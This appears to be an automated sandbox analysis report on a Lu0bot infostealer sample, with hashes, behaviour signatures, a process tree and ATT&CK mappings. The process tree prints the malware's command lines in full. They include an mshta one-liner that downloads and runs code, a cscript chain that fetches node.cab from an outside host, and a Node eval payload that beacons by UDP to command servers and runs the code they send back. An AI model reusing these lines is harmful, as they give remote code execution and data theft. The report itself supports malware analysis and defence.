Analysis

  • max time kernel
    149s
  • max time network
    193s
  • platform
    windows7_x64
  • resource
    win7v20210410
  • submitted
    20-07-2021 08:14

General

  • Target

    usfive_20210720-060205.exe

  • Size

    3KB

  • MD5

    463127c9a2b5eb1bca799aced10e4954

  • SHA1

    df78c1cca98d6f260f744a2b0639e1fff1c11a5e

  • SHA256

    863c612734f5ff0ff0ea3fed7fd790dfb43c47eecdc1417bcd82c0ad866419af

  • SHA512

    86c01a90941ad53e7d5c77b64c249bb0b4a69d9cc0f3e3971813464312a80ef6b06caef24cec9e9e194a25f0e667eafb445acbe9ce220830e4681312b498d9a4

Malware Config

Signatures

  • Lu0bot

    Lu0bot is a lightweight infostealer written in NodeJS.

  • Blocklisted process makes network request 2 IoCs
  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 1 IoCs
  • Modifies file permissions 1 TTPs 1 IoCs
  • Drops file in Windows directory 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Checks processor information in registry 2 TTPs 6 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates processes with tasklist 1 TTPs 1 IoCs
  • Gathers network information 2 TTPs 2 IoCs

    Uses commandline utility to view network configuration.

  • Gathers system information 1 TTPs 1 IoCs

    Runs systeminfo.exe.

  • NTFS ADS 2 IoCs
  • Script User-Agent 2 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 42 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Views/modifies file attributes 1 TTPs 2 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\usfive_20210720-060205.exe
    "C:\Users\Admin\AppData\Local\Temp\usfive_20210720-060205.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1920
    • C:\Windows\SysWOW64\mshta.exe
      mshta "javascript:document.write();0;y=unescape('%318%36%7E%68t%74p%3A%2F%2Fa%73u%302%2Es%68o%70%2F%68r%69%2F%3F2%31a%36e%34b%7E1%304').split('~');182;try{x='WinHttp';5;x=new ActiveXObject(x+'.'+x+'Request.5.1');141;x.open('GET',y[1]+'&a='+escape(window.navigator.userAgent),!1);238;x.send();115;y='ipt.S';143;new ActiveXObject('WScr'+y+'hell').Run(unescape(unescape(x.responseText)),0,!2);27;}catch(e){};167;;window.close();"
      2⤵
      • Blocklisted process makes network request
      • Suspicious use of WriteProcessMemory
      PID:1188
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /d/s/c cd /d "C:\ProgramData" & mkdir "DNTException" & cd "DNTException" & dir /a node.exe || ( echo x=new ActiveXObject("WinHttp.WinHttpRequest.5.1"^);x.Open("GET",unescape(WScript.Arguments(0^)^),false^);x.Send(^);b=new ActiveXObject("ADODB.Stream"^);b.Type=1;b.Open(^);b.Write(x.ResponseBody^);b.SaveToFile(WScript.Arguments(1^),2^); > get1626768896444.txt & cscript /nologo /e:jscript get1626768896444.txt "http%3A%2F%2Fasu02.shop%2Fhri%2F%3F244177cd5%26b%3D5b71d75d" node.cab & expand node.cab node.exe & del get1626768896444.txt node.cab ) & echo new ActiveXObject("WScript.Shell").Run(WScript.Arguments(0),0,false); > get1626768896444.txt & cscript /nologo /e:jscript get1626768896444.txt "node -e eval(unescape('s=require(%27dgram%27).createSocket(%27udp4%27);s.on(%27error%27,function(e){});s.i=%2744177cd5%27;function%20f(b){if(!b)b=new%20Buffer(%27p%27);s.send(b,0,b.length,19584,%27asu00.xyz%27);s.send(b,0,b.length,19584,%27lu0.viewdns.net%27)};f();s.t=setInterval(f,10000);s.on(%27message%27,function(m,r){try{if(!m[0])return%20s.c(m.slice(1),r);for(var%20a=1;a<m.length;a++)m[a]^=a^m[0]^134;m[0]=32;eval(m.toString())}catch(e){}})'))" & del get1626768896444.txt
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1760
        • C:\Windows\SysWOW64\cscript.exe
          cscript /nologo /e:jscript get1626768896444.txt "http%3A%2F%2Fasu02.shop%2Fhri%2F%3F244177cd5%26b%3D5b71d75d" node.cab
          4⤵
          • Blocklisted process makes network request
          PID:852
        • C:\Windows\SysWOW64\expand.exe
          expand node.cab node.exe
          4⤵
          • Drops file in Windows directory
          PID:572
        • C:\Windows\SysWOW64\cscript.exe
          cscript /nologo /e:jscript get1626768896444.txt "node -e eval(unescape('s=require(%27dgram%27).createSocket(%27udp4%27);s.on(%27error%27,function(e){});s.i=%2744177cd5%27;function%20f(b){if(!b)b=new%20Buffer(%27p%27);s.send(b,0,b.length,19584,%27asu00.xyz%27);s.send(b,0,b.length,19584,%27lu0.viewdns.net%27)};f();s.t=setInterval(f,10000);s.on(%27message%27,function(m,r){try{if(!m[0])return%20s.c(m.slice(1),r);for(var%20a=1;a<m.length;a++)m[a]^=a^m[0]^134;m[0]=32;eval(m.toString())}catch(e){}})'))"
          4⤵
          • Loads dropped DLL
          • Suspicious use of WriteProcessMemory
          PID:1672
          • C:\ProgramData\DNTException\node.exe
            "C:\ProgramData\DNTException\node.exe" -e eval(unescape('s=require(%27dgram%27).createSocket(%27udp4%27);s.on(%27error%27,function(e){});s.i=%2744177cd5%27;function%20f(b){if(!b)b=new%20Buffer(%27p%27);s.send(b,0,b.length,19584,%27asu00.xyz%27);s.send(b,0,b.length,19584,%27lu0.viewdns.net%27)};f();s.t=setInterval(f,10000);s.on(%27message%27,function(m,r){try{if(!m[0])return%20s.c(m.slice(1),r);for(var%20a=1;a<m.length;a++)m[a]^=a^m[0]^134;m[0]=32;eval(m.toString())}catch(e){}})'))
            5⤵
            • Executes dropped EXE
            • Checks processor information in registry
            • NTFS ADS
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of WriteProcessMemory
            PID:276
            • C:\Windows\SysWOW64\cmd.exe
              cmd.exe /c dir C:\
              6⤵
                PID:1360
              • C:\Windows\SysWOW64\cacls.exe
                cacls.exe C:\ProgramData\DNTException /t /e /c /g Everyone:F
                6⤵
                  PID:1868
                • C:\Windows\SysWOW64\icacls.exe
                  icacls.exe C:\ProgramData\DNTException /t /c /grant *S-1-1-0:(f)
                  6⤵
                  • Modifies file permissions
                  PID:608
                • C:\Windows\SysWOW64\attrib.exe
                  attrib.exe +H C:\ProgramData\DNTException
                  6⤵
                  • Views/modifies file attributes
                  PID:1676
                • C:\Windows\SysWOW64\attrib.exe
                  attrib.exe +H C:\ProgramData\DNTException\node.exe
                  6⤵
                  • Views/modifies file attributes
                  PID:1680
                • C:\Windows\SysWOW64\tasklist.exe
                  tasklist /fo csv /nh
                  6⤵
                  • Enumerates processes with tasklist
                  • Suspicious use of AdjustPrivilegeToken
                  PID:1696
                • C:\Windows\SysWOW64\Wbem\wmic.exe
                  wmic process get processid,parentprocessid,name,executablepath /format:csv
                  6⤵
                  • Suspicious use of AdjustPrivilegeToken
                  PID:912
                • C:\Windows\SysWOW64\ipconfig.exe
                  ipconfig.exe /all
                  6⤵
                  • Gathers network information
                  PID:332
                • C:\Windows\SysWOW64\route.exe
                  route.exe print
                  6⤵
                    PID:524
                  • C:\Windows\SysWOW64\netstat.exe
                    netstat.exe -ano
                    6⤵
                    • Gathers network information
                    • Suspicious use of AdjustPrivilegeToken
                    PID:1164
                  • C:\Windows\SysWOW64\systeminfo.exe
                    systeminfo.exe /fo csv
                    6⤵
                    • Gathers system information
                    PID:672

        Network

        MITRE ATT&CK Matrix ATT&CK v6

        Execution

        Command-Line Interface

        1
        T1059

        Persistence

        Hidden Files and Directories

        1
        T1158

        Defense Evasion

        File Permissions Modification

        1
        T1222

        Hidden Files and Directories

        1
        T1158

        Discovery

        System Information Discovery

        4
        T1082

        Query Registry

        1
        T1012

        Process Discovery

        1
        T1057

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\ProgramData\DNTException\get1626768896444.txt
          MD5

          52ec5ebd8a447b5115ce83e703bcde51

          SHA1

          38ce97f87c6be668d07985558fc89c53e27770a3

          SHA256

          ef1be6a77e480e683331052654d3db47a02fe4b7af3e35e67b9248e989307615

          SHA512

          9af71d426564ef92ff6de1d89107161c138bbdd9dc08b5e380a0b94e7b2e91ec4d498a1d8f4514552a45bf14a8f9078dc295aa1cb86cfc063427ad218e9d5f32

        • C:\ProgramData\DNTException\get1626768896444.txt
          MD5

          e15f82747d0884d61a5bc4fb2db7d29d

          SHA1

          aca478622586f17603fe56705fd319b75198b2b0

          SHA256

          982675d0465497986b3ece89f08f81a4629d975617671153e0ca653f2589966f

          SHA512

          d8c17e54cbefa72191c238f23d619a4637fd74c8c8b9975071bf5507c5a34259495cd20e516c7f7f0c215ec4f724b22de88b8a5ea43765c019eb067600cf661d

        • C:\ProgramData\DNTException\node.cab
          MD5

          c7ed3d9304a29c8b472174bd910be071

          SHA1

          22b7d55b80acd434c13b0a2d8c59b45c10220a42

          SHA256

          abbaffb1b56bd3c5db5aedf4bdc0794d82bedba43677d13cd1056cb5412b3441

          SHA512

          c65c80564019ae54145a939f9ed463895c337f020cbd769647dc6baf8db5db283a5e151c2ae4f10681d23db161d791ce59c395d8ebba603a27a2a6be0368a1a2

        • C:\ProgramData\DNTException\node.exe
          MD5

          11f0b4e17e686cdc46f85a6becede4a8

          SHA1

          2826f7ac33b43439ecddd08ad541a7f54a9eb7c0

          SHA256

          6a6ce9cbc42560a1d0ed9c04dcdcb84127f0c2e90d4850fd0e3003b31549795c

          SHA512

          11a321cc6685f854544a5228ae27cf311cf7ccc534be5255b4a6e6976c3d3c6ebe9d0873f8af0ad409d7893ea616754ebbf917e561d84bc22e81e030af4d084f

        • C:\ProgramData\DNTException\node.exe
          MD5

          11f0b4e17e686cdc46f85a6becede4a8

          SHA1

          2826f7ac33b43439ecddd08ad541a7f54a9eb7c0

          SHA256

          6a6ce9cbc42560a1d0ed9c04dcdcb84127f0c2e90d4850fd0e3003b31549795c

          SHA512

          11a321cc6685f854544a5228ae27cf311cf7ccc534be5255b4a6e6976c3d3c6ebe9d0873f8af0ad409d7893ea616754ebbf917e561d84bc22e81e030af4d084f

        • \ProgramData\DNTException\node.exe
          MD5

          11f0b4e17e686cdc46f85a6becede4a8

          SHA1

          2826f7ac33b43439ecddd08ad541a7f54a9eb7c0

          SHA256

          6a6ce9cbc42560a1d0ed9c04dcdcb84127f0c2e90d4850fd0e3003b31549795c

          SHA512

          11a321cc6685f854544a5228ae27cf311cf7ccc534be5255b4a6e6976c3d3c6ebe9d0873f8af0ad409d7893ea616754ebbf917e561d84bc22e81e030af4d084f

        • memory/276-75-0x0000000025900000-0x0000000025901000-memory.dmp
          Filesize

          4KB

        • memory/276-76-0x000000003DA00000-0x000000003DA01000-memory.dmp
          Filesize

          4KB

        • memory/276-71-0x0000000000000000-mapping.dmp
        • memory/276-77-0x0000000006B00000-0x0000000006B01000-memory.dmp
          Filesize

          4KB

        • memory/276-73-0x0000000005F00000-0x0000000005F01000-memory.dmp
          Filesize

          4KB

        • memory/276-74-0x0000000024D00000-0x0000000024D01000-memory.dmp
          Filesize

          4KB

        • memory/276-78-0x000000003D100000-0x000000003D101000-memory.dmp
          Filesize

          4KB

        • memory/332-86-0x0000000000000000-mapping.dmp
        • memory/524-88-0x0000000000000000-mapping.dmp
        • memory/572-64-0x0000000000000000-mapping.dmp
        • memory/608-81-0x0000000000000000-mapping.dmp
        • memory/672-90-0x0000000000000000-mapping.dmp
        • memory/852-61-0x0000000000000000-mapping.dmp
        • memory/852-63-0x0000000074FB1000-0x0000000074FB3000-memory.dmp
          Filesize

          8KB

        • memory/912-85-0x0000000000000000-mapping.dmp
        • memory/1164-89-0x0000000000000000-mapping.dmp
        • memory/1188-59-0x0000000000000000-mapping.dmp
        • memory/1360-79-0x0000000000000000-mapping.dmp
        • memory/1672-66-0x0000000000000000-mapping.dmp
        • memory/1676-82-0x0000000000000000-mapping.dmp
        • memory/1680-83-0x0000000000000000-mapping.dmp
        • memory/1696-84-0x0000000000000000-mapping.dmp
        • memory/1760-60-0x0000000000000000-mapping.dmp
        • memory/1868-80-0x0000000000000000-mapping.dmp